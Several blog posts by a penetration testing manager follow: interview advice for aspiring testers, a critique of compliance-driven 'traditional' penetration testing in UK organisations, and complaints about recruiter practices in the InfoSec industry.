Before you go to the interview, it's always worth asking what will be required and whether you need to prepare anything. Interviews are an opportunity to sell yourself; mention anything related to the field of penetration testing that you have done. I recall one specific interview with a very shy gentleman who really struggled to explain some really basic concepts, such as what port scanning was, and had never heard of the OWASP Top 10; things were taking a nose-dive. Suffice to say, he hadn't done well and didn't appear to have a clue about anything in security, despite having quite a promising CV. At least until I asked him the question 'what do you do in your spare time?', to which he answered: "Oh, I like exploit development and malware reversing normally. You know that bug that was found in IE last week? That was me, I got £10k from Microsoft for that." Totally mental that he didn't mention that, even after I asked him the ubiquitous 'tell me about yourself?' at the start of the interview.


I hope that my post has provided a useful amount of information to aspiring Penetration testers, if you have any comments, criticisms or more questions please leave them below.

Penetration Testing: You’re Doing it Wrong (?) – Part One

Sexual innuendos aside, I've wanted to write an article about the unspoken thoughts of penetration testers (at least my own and those of the great testers I've been lucky enough to work with) for quite some time, but 100-hour weeks and international travel for work tend to get in the way! The main focus of this post is to describe the typical approaches of both the security assessment services industry and the organisations that consume them. I have given particular focus to new attempts to make testing more realistic and how this compares to what I term 'Traditional Penetration Testing'. I also touch on actionable OSINT and Threat Intelligence, as well as Threat and Risk modelling as a function of assessment strategies. The context of this post assumes a medium to large sized organisation with at least a moderate level of maturity, such as maintaining an accreditation framework like PCI DSS or ISO 27001.

What Do I Define as Traditional Penetration Testing?

I describe a traditional penetration test in much the same way as industry and accreditation bodies do, which is in terms of application and infrastructure testing. Typically, a large organisation will have two main streams of testing that pinpoint the new and the old. Business as usual (BAU) testing includes existing infrastructure and applications that are tested on an annual (or otherwise periodic) basis, which includes compliance-driven assessments. Project-based testing often comprises wholly new applications and infrastructure that need to be assessed before going 'live'. The two most common (in my experience) approaches to servicing this requirement are a penetration testing framework that involves multiple suppliers (often using a round-robin approach to avoid claims of inequality) and a single-supplier approach. Additionally, it's worth noting that SMEs will typically use a single supplier or multiple suppliers to service ad hoc requirements and will often create RFPs for each requirement.

So, Why is This Wrong?

One of the key criticisms of this approach is that it's unrealistic. For example, performing an eight-day black box Web application penetration test in your staging environment is the equivalent of building a temporary six-foot wall around your brand new house and attesting the security of the en-suite bathroom by getting a fat kid to lean against the front gate for a couple of hours and play knock-down-ginger with their bespectacled best friend. This is a criticism I agree with, as tests often lack context and realism, and their approach is based on improper calculation of the likelihood of attack and compromise. Often, this type of approach is justified by the low business impact or revenue generation of the asset, or by cries of 'industry best practice'. The truth is that baked-in 'security as a feature' - with its genesis in SDLC, secure architecture and user education - consistently provides better return on investment (not to be mistaken for cheapness) and more robust attack surfaces than atomic assessment of network sub-sets and standalone applications.

Moreover, many key elements of how threat actors will approach an attack are left out, as vectors such as (D)DoS attacks and social engineering are ubiquitously omitted from scopes. There are obviously ‘good’ reasons why this may be the case, such as cost, perceived ROI, perceived risk and legal implications. Fundamentally, most of these assumptions are wrong. There are ways of reducing these types of risks to acceptable levels for almost all scenarios - so why don’t people do it? I think the most correct answer is that the decision / policy makers don’t know how, and more importantly they don’t want to admit they don’t know how. It’s a very safe option to subscribe to conventional (circa 1995) wisdom and take an additive approach to anything new, giving a hat-tip and a wink to the industry and your peers that you’re at the forefront. This often involves tacking ‘bleeding edge’ services or appliances on to end-of-year budget surplus rather than questioning the value of what’s being done and going down the rabbit hole bottom-up (ooo err), armed with the detail of new approaches.

Another key cogitation is the quality of testing and the ultimate understanding that's passed on to those who design and create IT systems and infrastructures. As traditional penetration testing services are largely undifferentiated and a commodity (in the UK market), it's difficult to know what 'good' is, even within the scope of a concept that is arguably broken. The industry is largely underpinned by the CESG CHECK scheme as a baseline for individual skill, with CTM and CTL status being used as metrics. In reality, the testing quality you get depends on the individual doing the testing, not so much the company you hire (although this affects the overall experience as a consumer). As a minimum, most pen testing service providers will normally quote a framework or a baseline that they align to (such as OSSTMM, PTES or NIST SP 800-115), have a defined methodology, and in lots of cases a checklist they follow when testing. A good example of a baseline is the OWASP Top 10, used as a measure for assessing web applications. The OWASP Top 10 is simply a list of the ten most common vulnerability categories OWASP sees across the Internet. The issue with these types of measures is that your top 10 may not be the OWASP Top 10, and you may be missing key tests due to lack of context and a one-size-fits-all approach. From experience of testing frameworks, if a client gives a supplier 100 web applications to test over the course of a year, it's likely that most of the vulnerabilities discovered will be repeated again and again due to reuse of badly written libraries or mistakes learned during the development process and server build / configuration. How many paid-for hours could be negated by trend analysis, code review of re-used libraries, and documentation of secure builds and hardening, rather than testing what's essentially the same application over and over again and finding the same issues? It's not uncommon to see this carry over year on year, with new testing firms being brought in to validate findings.

Conclusions

To conclude, I believe that a lot of the shortfalls in basic security hygiene come from the people running the show (read CISO, CTO, InfoSec Manager). There is a simple lack of understanding of Cyber threat / risk and how to quantify, prioritise and remediate. It’s a lot easier to not rock the boat, make a metaphorical pinkie swear with China and North Korea to the effect of ‘don’t ask don’t tell’, than to admit you don’t understand your attack surface or how to manage it.

And then?


I think that I've carried on quite enough for a single post about the issues, so I'll continue in a new post on how I believe these issues can be remediated, with a detailed discussion of simulated attacks, CREST STAR and CBEST, the pitfalls of changing tack, and the risk of doing nothing.

When Two Worlds Collide: Why InfoSec Professionals Hate Recruiters

In honesty, I’ve never been overly fond of recruiters, stemming from my early days in the industry being duped into long journeys for interviews that were totally inappropriate, so the recruiter could make their number. However, it’s obviously unfair to tar all recruiters with the same brush, they’re just doing their job (to varying ethical and moral levels). I’m starting to see more and more posts from recruiters on LinkedIn, showing frustration at rude or terse reactions from the InfoSec community (especially Pen testers). I decided to write a post on the subject to discuss some of my thoughts on the topic and outline some of the key points on both sides, having used recruiters in my own career and also been on the hiring manager side.

What candidates need to remember is that recruiters are salespeople, they just sell people. What recruiters need to remember, is that they’re selling people and lifestyles, not things. A job is something that most of us spend a huge part of our lives doing and is therefore closely aligned to satisfying our various needs and wants. If you took the rather grim view of your life as a commodity, where you could buy and sell the hours within it, would you entrust a proportion of that to a middle-man (or woman) who is quite obviously dishonest, unethical and lazy?

Where Recruiters Go Wrong

As I start writing this section, I’m already pretty sure this is going to be the bulk of this post. I’ve experienced most of these gripes; a few on a daily basis. Some items on this list I’ve seen as a candidate and some are as a hiring manager – I don’t believe my experience is unique. I’m often pretty blunt with people who manage to reach me in these ways, mostly because I don’t agree with the approach on an ethical basis. I don’t think I’m alone.
  • Inappropriate Job Suggestions
This is really common; I think most people in InfoSec get these 2-3 times per week (if not daily). The thing that frustrates me most is that it's so obviously lazy. Our industry is obviously very security and tech savvy; we know the recruiter has done a LinkedIn keyword search and we're one of the lucky people who popped up. Thus follows a boilerplate email asking for a call about a role that is in no way close to what we do. The expectant chaser emails (also boilerplate) are always a nice touch.
  • Calling People in their office, often via generic or switchboard numbers
This is totally unprofessional and often leads to trouble for the candidate the recruiter is targeting – a few years ago a recruiter actually got through to my desk phone via my boss by posing as a candidate; he thought he was pretty smart when he revealed his Ocean's Eleven-esque scheme to me.
  • Sending CVs before getting permission
Again, this is totally unprofessional, not to mention in breach of the Data Protection Act. I'd recommend that if anyone discovers this is the case, they report it as a serious matter to the agency concerned and possibly to the ICO. Moreover, part of me feels that individuals should be more cautious about who they send their CV to. The recruiter will often try "I can't tell you who the company is until you send me your CV"; this strict stipulation doesn't often last long after you say you're not interested in that case, and then they spill the beans. The amusing part is that, as the industry is so small, you usually know the key contact at the company and can drop them a note to advise what's happened – I've done this with candidates in some cases where their CV has hit my inbox in a suspicious or unsolicited fashion. I know many others who kindly do the same.
  • Cut and Paste exploratory emails
As a hiring manager I get these pretty frequently: a cut-and-pasted boilerplate introduction on LinkedIn about how successful the recruiter has been and how I should consider using them. They obviously really want my business and to build a relationship THAT much: they took the time to change the name at the top. If I tried to work with clients at Director level and above with this approach, I'd not last long. We're not short of networking events, conferences etc. In my view there's no excuse for the junk and scattergun approach.
  • Pretending they’ve spoken to you before or know you
This drives me nuts. Normally, the email (or InMail) starts "I just tried to call you" or "We spoke some time ago", neither of which is true. It's often a subtle reference, but for some reason some recruiters think you won't realise. It's such an obvious trick, and pen testers (who spend their whole day trying to think like sneaky criminals) spot it a mile off. Let's at least try and start with honesty.
  • Pretending they know someone you do
Another really silly and dishonest mistake is thinking that people don’t talk to their friends. If someone says “I got your name from Ben, we’ve worked together and he told me to call you”, the first thing I’m going to do is send a message to Ben along the lines of “wtf” or “orly”. Lies and deceit are not the way to form long lasting business relationships.
  • The recruiter explains the industry to you
It’s always great to have someone with a couple of years’ experience in recruitment tell you how your job works and what people are looking for. General coaching is really useful when you’re quite junior, but a lot of people find this strange and somewhat embarrassing.
  • The recruiter's job title is "Information Security Consultant" or similarly misleading
I've seen a few threads online where people complain about this; I tend to agree that it is poor practice and is largely perpetuated to trick people into connecting with a recruiter, thinking they are a peer within the industry. It can be quickly remedied by viewing the person's profile before connecting, but that doesn't negate the dishonesty.
  • General Shenanigans
<insert horror story or anecdote>

The Other Side

Not all recruiters are bad. I'd say the good ones are certainly in the minority in my experience, but we should remember that they're people who're just trying to make a living too. The reality is that recruiters aren't going anywhere anytime soon, so we should grow thicker skins and work on solutions rather than complaining all the time. Companies are always going to use recruiters to find talent, whether it's to obscure their hiring activity from the public eye, to save money, or because they just like to troll us. We can either help improve the situation or watch as it gets worse. There is actually an industry body in the UK for recruiting firms, REC (https://www.rec.uk.com/membership/compliance/code-of-practice), but it requires agencies to join before they're subject to its code of practice and membership isn't widely mandated. I've also seen a recent effort from CERIS (https://www.getfeedback.com/r/1V16FODf) to create an industry body dedicated to recruitment practices within InfoSec; however, they are yet to get a proper website, and talk of alignment with industry bodies such as CREST appears to have fallen down.

Room for Recruiters in InfoSec?

In smaller niches of the industry, such as penetration testing, it's easy to think that everybody knows everybody else – so why do we need recruiters, right? Yet out of the ~1500 testers floating around, probably half are vaguely good (I'm being generous), and maybe a fifth of those may be open to a move at any one time. Then there are multiple levels of seniority – and that's only counting experienced hires. So, how do you find the good ones? Most organisations don't have the resources or relevant skills (in their HR dept.) to search for these types of people and, anecdotally speaking, they rely on internal recommendations. As a Director (and hiring manager) of a rapidly growing large consultancy, I'd put recruiting as one of my top two priorities (probably only second to culture). I probably attend more than ten conferences per year (technical ones such as 44con, Kiwicon, ZeroNights, Brucon, Ruxcon, HITB, DerbyCon, BlackHat, Defcon) with one of the key goals being finding talent. I'd say that this (combined with trawling blogs / github) gets me about 75% of the way there and costs me a lot of time and my travel budget. The other 25% takes me hours of trawling LinkedIn (I don't use external recruiters right now). For smaller organisations or more corporate ones, this simply isn't an option, and I can see how the typical 'pay for results' model is appealing.

I feel there is a place for recruiters in our industry, but for nowhere near as many as there are now, and they should try a lot harder to understand the different disciplines, qualifications and experience levels, as well as exercising a basic level of ethics and honesty. However, I feel a lot more could be done by industry bodies to assist in this area, providing job boards and independent mechanisms for candidates to find roles.
